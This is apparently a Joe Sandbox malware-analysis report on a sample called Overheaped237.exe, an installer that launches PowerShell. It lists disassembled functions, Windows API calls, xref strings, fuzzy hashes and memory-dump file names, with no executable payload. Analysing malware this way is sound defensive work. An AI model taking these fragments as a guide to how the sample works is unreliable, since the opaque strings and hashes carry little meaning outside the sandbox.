Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 4b124ebf7538d090bfdb3da7142055cc4b6059543a11cd4ffa057e0c03021937
Instruction ID: 869b35d44be7719ac4f8667573c2d83536e062a508785c5670752e956bf1946f
Opcode Fuzzy Hash: 4b124ebf7538d090bfdb3da7142055cc4b6059543a11cd4ffa057e0c03021937
Instruction Fuzzy Hash: 1BF0ECB2A04114AFEB01ABE4DD88DAFB7BDEB54305B104476F602F6191C7749D018B79

Function 00401D38 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D3B
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
ReleaseDC.USER32(?,00000000), ref: 00401D68
CreateFontIndirectA.GDI32(0040A808), ref: 00401DB3

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: d1d98ef4ca3702c11c3c6dceaa5369c7d293144b8b7f1186970544015a90a800
Instruction ID: 002072324c9ca14b61f47775792bd0911152047613ce7f91f46ea316c06ba8c0
Opcode Fuzzy Hash: d1d98ef4ca3702c11c3c6dceaa5369c7d293144b8b7f1186970544015a90a800
Instruction Fuzzy Hash: 22016232944340AFE7016770AE5EBAA3FA89795305F108479F641B62E2C67801568F6F

Function 00403AA8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(00000000,00422F20), ref: 00403B40

Strings

1033, xrefs: 00403AAC, 00403AB6, 00403B27
shovelhead Setup: Completed, xrefs: 00403AAB
"C:\Users\user\Desktop\Overheaped237.exe", xrefs: 00403AA9

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: TextWindow
String ID: "C:\Users\user\Desktop\Overheaped237.exe"$1033$shovelhead Setup: Completed
API String ID: 530164218-714246828
Opcode ID: dc7de13f03dcb223900496a96d71cfcacf6227c358a972dc05920cca8a73c9bc
Instruction ID: 4ecc7a7cce5d2b157b8937249730f08b858357f8198c33761da0ca3de106299a
Opcode Fuzzy Hash: dc7de13f03dcb223900496a96d71cfcacf6227c358a972dc05920cca8a73c9bc
Instruction Fuzzy Hash: CE11C971B006119BC7309F55DC909737B7CEB8571A364817FD90167391D73DAD029A58

Function 004058D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403218,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040341B), ref: 004058DB
CharPrevA.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403218,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,0040341B), ref: 004058E4
lstrcatA.KERNEL32(?,00409014), ref: 004058F5

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 004058D5

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user~1\AppData\Local\Temp\
API String ID: 2659869361-2382934351
Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
Instruction ID: 3de60a59262c475c5440d19c682801eda6224deee4fb27ea49e877a9fa99e37c
Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
Instruction Fuzzy Hash: A6D0A972605A303AD20233198C05E8B3A08CF26351B040032F641B22A2CA7C0E418BFE

Function 0040596E Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,?,C:\,?,004059DA,C:\,C:\,771B3410,?,771B2EE0,00405725,?,771B3410,771B2EE0,00000000), ref: 0040597C
CharNextA.USER32(00000000), ref: 00405981
CharNextA.USER32(00000000), ref: 00405995

Strings

C:\, xrefs: 0040596F

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: CharNext
String ID: C:\
API String ID: 3213498283-3404278061
Opcode ID: c01f0a1332e094523614662ca2a683f3687d2570a221d834ee5f6cec315170af
Instruction ID: 93fa8612b98c37d3538e1dab61372dab2b439c5e428625c22ffade58a408e5cb
Opcode Fuzzy Hash: c01f0a1332e094523614662ca2a683f3687d2570a221d834ee5f6cec315170af
Instruction Fuzzy Hash: D0F096D1909F60ABFB3292684C54B775B8DCB55771F18547BE540B62C2C27C48408FAA

Function 00404FF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040501F
CallWindowProcA.USER32(?,?,?,?), ref: 00405070

Part of subcall function 00404094: SendMessageA.USER32(000103EE,00000000,00000000,00000000), ref: 004040A6

Strings

, xrefs: 00405000

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
Instruction ID: c10ccb832a2a3496aa312e1d90523b33251ee11bfabb6cbb9dcba6f20acc8f53
Opcode Fuzzy Hash: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
Instruction Fuzzy Hash: ED018471504609ABDF205F61EC80EAF3725EB84754F148037FB01751E2C77A8C929FAA

Function 0040591C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402D22,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Overheaped237.exe,C:\Users\user\Desktop\Overheaped237.exe,80000000,00000003), ref: 00405922
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402D22,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Overheaped237.exe,C:\Users\user\Desktop\Overheaped237.exe,80000000,00000003), ref: 00405930

Strings

C:\Users\user\Desktop, xrefs: 0040591C

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3976562730
Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
Instruction ID: 8de3941b568bd0f8b26bcb964e879cd368c776abfab0e8ce3c3ebd0dc0734e68
Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
Instruction Fuzzy Hash: 1CD0C7B2409D70AEE3036314DC04F9F6A48DF27715F094462E181E61A1C6BC5D814BED

Function 00405A3B Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A4B
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405A63
CharNextA.USER32(00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A74
lstrlenA.KERNEL32(00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A7D

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
Instruction ID: 761e0a114986e2dc795515ee57e72db75caae44d6787476300dd9688655b7936
Opcode Fuzzy Hash: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
Instruction Fuzzy Hash: 2FF06232605518BFC7129FA5DC40D9EBBA8EF16350B2541B5F800F7250D674EE019FA9

Analysis Process: powershell.exePID: 6256, Parent PID: 1920COMMON

Executed Functions

Function 06F1B1E0 Relevance: 28.8, Strings: 22, Instructions: 1292COMMON

Download Yara Rule

Strings

$q, xrefs: 06F1B625
4'q, xrefs: 06F1B792
$q, xrefs: 06F1B287
4'q, xrefs: 06F1BBD8
$q, xrefs: 06F1B27B
4'q, xrefs: 06F1B540
4'q, xrefs: 06F1C0B5
$q, xrefs: 06F1B237
4'q, xrefs: 06F1B8ED
$q, xrefs: 06F1B253
4'q, xrefs: 06F1B788
$q, xrefs: 06F1BBAD
4'q, xrefs: 06F1C159
4'q, xrefs: 06F1C16F
$q, xrefs: 06F1B2A3
4'q, xrefs: 06F1B8F9
$q, xrefs: 06F1B297
4'q, xrefs: 06F1B54C
$q, xrefs: 06F1BB9D
$q, xrefs: 06F1BB42
4'q, xrefs: 06F1BBCC
4'q, xrefs: 06F1C0CB

Memory Dump Source

Source File: 00000002.00000002.2074296046.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q
API String ID: 0-1908977668
Opcode ID: fbc9bad40f5c7dc9d47ba251b331a305fd7e0e0fca3390f03ac38370d9007ba0
Instruction ID: 4f16f0535645659e9a9fb4723290dd364e5db3e3d27068952f8b13da88e2e14a
Opcode Fuzzy Hash: fbc9bad40f5c7dc9d47ba251b331a305fd7e0e0fca3390f03ac38370d9007ba0
Instruction Fuzzy Hash: 45B2E430F00319DFDB65DB65C8547AABBB2AF89350F1480AAD9099F391DB32DD42CB91

Function 08C80CD8 Relevance: 22.4, Strings: 17, Instructions: 1147COMMON

Download Yara Rule

Strings

$q, xrefs: 08C816C8
4'q, xrefs: 08C813F5
$q, xrefs: 08C81397
tPq, xrefs: 08C81764
$q, xrefs: 08C81366
Pim, xrefs: 08C8186B
tPq, xrefs: 08C81770
4'q, xrefs: 08C815E2
$q, xrefs: 08C816E4
$q, xrefs: 08C8170C
$q, xrefs: 08C8172B
4'q, xrefs: 08C815EE
$q, xrefs: 08C81700
$q, xrefs: 08C8171F
$q, xrefs: 08C81387
Pim, xrefs: 08C81861
4'q, xrefs: 08C81401

Memory Dump Source

Source File: 00000002.00000002.2079006895.0000000008C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c80000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$Pim$Pim$tPq$tPq$$q$$q$$q$$q$$q$$q$$q$$q$$q
API String ID: 0-762329335
Opcode ID: f8ec8a9467eab6a9f9a98e1c42a7f534b163a70ca1d45185345f184ff5e2ce3b
Instruction ID: 515d1d11264ee788de10d22ca943a5e24e75121d47c919c3d8763a35bf314ea6
Opcode Fuzzy Hash: f8ec8a9467eab6a9f9a98e1c42a7f534b163a70ca1d45185345f184ff5e2ce3b
Instruction Fuzzy Hash: 67928230B40204DFD724EBA5D454BAABBF2AF89316F19C06AD8059B391DB31DD47CBA1

Function 08C825E8 Relevance: 9.6, Strings: 7, Instructions: 839COMMON

Download Yara Rule

Strings

4'q, xrefs: 08C82BDF
tPq, xrefs: 08C82619
$q, xrefs: 08C82B9B
4'q, xrefs: 08C82BEB
$q, xrefs: 08C82BB7
$q, xrefs: 08C82BC3
tPq, xrefs: 08C82623

Memory Dump Source

Source File: 00000002.00000002.2079006895.0000000008C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c80000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$tPq$tPq$$q$$q$$q
API String ID: 0-2432477355
Opcode ID: 18a5c399736b75c67178aadb99dc6389b4d120ebdb0d9677e7d63fb48bf2a60c
Instruction ID: 57bd681e66ee39690216bea42c7d41bb71b547c2fc6bfd63cf7bd2fedbb05765
Opcode Fuzzy Hash: 18a5c399736b75c67178aadb99dc6389b4d120ebdb0d9677e7d63fb48bf2a60c
Instruction Fuzzy Hash: 26521830B40215DFDB24AF69D80476ABBB2BF88316F14C46EE9459B391DB31DD42CBA1

Function 06F162C8 Relevance: 8.5, Strings: 6, Instructions: 951COMMON

Download Yara Rule

Strings

tPq, xrefs: 06F165AC
4'q, xrefs: 06F1642D
4'q, xrefs: 06F16421
4'q, xrefs: 06F1676B
4'q, xrefs: 06F1675F
tPq, xrefs: 06F165B8

Memory Dump Source

Source File: 00000002.00000002.2074296046.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$tPq$tPq
API String ID: 0-3271992745
Opcode ID: dea10453bf7480d61ff0a95006b8a64a4968445561a28247cbbd4e5b5aa0922c
Instruction ID: 95af282a09a53865759ba71a11d5955c6d1e72b876ace638869eedc04d336a57
Opcode Fuzzy Hash: dea10453bf7480d61ff0a95006b8a64a4968445561a28247cbbd4e5b5aa0922c
Instruction Fuzzy Hash: A182AE34F002049FE754DF58C864BAABBA2BF89345F15C069E905AF395CB72EC42CB91

Function 06F170C8 Relevance: 7.9, Strings: 6, Instructions: 373COMMON

Download Yara Rule

Strings

Pim, xrefs: 06F170F7
4'q, xrefs: 06F1745C
Pim, xrefs: 06F17101
4'q, xrefs: 06F173DD
4'q, xrefs: 06F17450
4'q, xrefs: 06F173D1

Memory Dump Source

Source File: 00000002.00000002.2074296046.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q$Pim$Pim
API String ID: 0-2588525706
Opcode ID: c2798a41a424fe01d49c447ca34b6f2a1c5cdceccbbe940542a02463a28f4033
Instruction ID: 68f110ab7bcbd16058574ac3a65ba2daf65b9b7d6b9eb8cbbe6e13d4264ffcfb
Opcode Fuzzy Hash: c2798a41a424fe01d49c447ca34b6f2a1c5cdceccbbe940542a02463a28f4033
Instruction Fuzzy Hash: B0E1B334F102159FEB54EF68C855B6EBBA2AF88340F15C029D9096F395CB72EC42CB95

Function 06F17720 Relevance: 5.9, Strings: 4, Instructions: 879COMMON

Download Yara Rule

Strings

Pim, xrefs: 06F18598
Pim, xrefs: 06F1858E
4'q, xrefs: 06F17E6A
4'q, xrefs: 06F17E76

Memory Dump Source

Source File: 00000002.00000002.2074296046.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$Pim$Pim
API String ID: 0-3445111953
Opcode ID: d519fa20b240810060cbc948539e4c253f8501e626c4c247fa5f4eaa23bdeb85
Instruction ID: 64bde525a7a612f9e7d66051e1e4e9b934759f9a99684dd3da53436171567f75
Opcode Fuzzy Hash: d519fa20b240810060cbc948539e4c253f8501e626c4c247fa5f4eaa23bdeb85
Instruction Fuzzy Hash: 0D828C34F002149FE764DF58C954BAABBB2BB89350F15C0A9D909AF391CB72ED41CB91

Function 06F12070 Relevance: 5.6, Strings: 4, Instructions: 595COMMON

Download Yara Rule

Strings

4'q, xrefs: 06F12512
4'q, xrefs: 06F123AE
4'q, xrefs: 06F12508
4'q, xrefs: 06F123B8

Memory Dump Source

Source File: 00000002.00000002.2074296046.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q$4'q
API String ID: 0-4210068417
Opcode ID: 6f532b0716daed80a626411018cd31703df35c3e3fd15c63691bbaa6c0267826
Instruction ID: 30d7ef07fa6f62f5d503630f712d5ba4da5e3216117abd3d1c030bb4d494d732
Opcode Fuzzy Hash: 6f532b0716daed80a626411018cd31703df35c3e3fd15c63691bbaa6c0267826
Instruction Fuzzy Hash: 2D126F31F003559FE7659BA8981076A7BA2AFC5351F14807AD945CF386DB32CE82C7E2

Function 06F1CFC1 Relevance: 4.8, Strings: 3, Instructions: 1043COMMON

Download Yara Rule

Strings

4'q, xrefs: 06F1D304
4'q, xrefs: 06F1D31A
4'q, xrefs: 06F1CB75

Memory Dump Source

Source File: 00000002.00000002.2074296046.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$4'q
API String ID: 0-3126650252
Opcode ID: fb429e059baf2a24608f9c3df005329a25f6d7ab4af19fc14f7e3e20812e3d67
Instruction ID: 572e4dff54202a132108f1a38c9f7b233423a00b184a0383f97054dc1b5b5403
Opcode Fuzzy Hash: fb429e059baf2a24608f9c3df005329a25f6d7ab4af19fc14f7e3e20812e3d67
Instruction Fuzzy Hash: D1A23E74A003149FEB64DB54C954BAABBB2BF85340F1181E9E9099F391CB72ED81CF91

Function 06F170A0 Relevance: 4.1, Strings: 3, Instructions: 315COMMON

Download Yara Rule

Strings

Pim, xrefs: 06F170F7
4'q, xrefs: 06F17450
4'q, xrefs: 06F173D1

Memory Dump Source

Source File: 00000002.00000002.2074296046.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q$Pim
API String ID: 0-2335562170
Opcode ID: 05192000fd91a055c3e404442be6183d210020d01fbbc350cd7f800d596f7fca
Instruction ID: 77c1ce16a1514cc8681134f8acd467b5285181a712dccd02f65c9c4f9b62ff51
Opcode Fuzzy Hash: 05192000fd91a055c3e404442be6183d210020d01fbbc350cd7f800d596f7fca
Instruction Fuzzy Hash: EDC19034E002159FDB55EF58C954BAEBBB2AF88340F15C059E8096F396CB72EC46CB91

Function 06F13E00 Relevance: 3.9, Strings: 3, Instructions: 124COMMON

Download Yara Rule

Strings

$q, xrefs: 06F13E5B
$q, xrefs: 06F13E23
$q, xrefs: 06F13E67

Memory Dump Source

Source File: 00000002.00000002.2074296046.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: $q$$q$$q
API String ID: 0-3067366958
Opcode ID: daed0baee69b83bba0d978778197682e9bb0381ebb2fbe891eaebfc9546d6139
Instruction ID: 1479e1b12d7540189c939e1b430b1855c6aee0dc51ce9984fc9c87071867104c
Opcode Fuzzy Hash: daed0baee69b83bba0d978778197682e9bb0381ebb2fbe891eaebfc9546d6139
Instruction Fuzzy Hash: 3C416933F003259FDBA45A6998402AAF7F1EF84250B14802ADC16EF381DB32DE05C7E5

Function 06F1C688 Relevance: 3.0, Strings: 2, Instructions: 504COMMON

Download Yara Rule

Strings

4'q, xrefs: 06F1CB81
4'q, xrefs: 06F1CB75

Memory Dump Source

Source File: 00000002.00000002.2074296046.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: cf3516eb8306aa5bb3d1bb2eeed0f1f2dc0d0e4ccc0b7fe152e994a8d7ecc462
Instruction ID: 487d6d3cb492b69fb6c9ee1035402ad194188e1f4f05896d1b2a35c3d6746613
Opcode Fuzzy Hash: cf3516eb8306aa5bb3d1bb2eeed0f1f2dc0d0e4ccc0b7fe152e994a8d7ecc462
Instruction Fuzzy Hash: 98227274B403149FD754DB18C955BAABBB2FB89300F1180A9EA099F391CB76ED42CF91

Function 06F1BCB8 Relevance: 2.9, Strings: 2, Instructions: 398COMMON

Download Yara Rule

Strings

4'q, xrefs: 06F1C159
4'q, xrefs: 06F1C0B5

Memory Dump Source

Source File: 00000002.00000002.2074296046.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6f10000_powershell.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 3adca446521fa3d83ffe2fd7a256477690f1723369140a1c7822d6e889f437d1
Instruction ID: f19f2a8d321c1bb871ac1190d6455433f60e5db754af4d4de35b44816cb7b4ca
